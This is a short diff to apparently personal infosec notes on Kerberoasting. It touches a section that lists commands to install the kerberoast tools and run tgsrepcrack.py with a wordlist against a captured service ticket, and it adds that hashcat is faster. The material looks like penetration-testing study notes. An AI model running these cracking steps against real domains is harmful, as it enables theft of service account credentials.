manununu/notes/infosec.md

 ### Cracking Service Ticket
-Since the service ticket is encrypted with the service accounts password hash, we can bruteforce this with a wordlist This is also possible with john the ripper or hashcat
+Since the service ticket is encrypted with the service accounts password hash, we can bruteforce this with a wordlist This is also possible with john the ripper or hashcat (which is a lot faster)
 ```
 sudo apt update && sudo apt install kerberoast
 python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt ticket.kirbi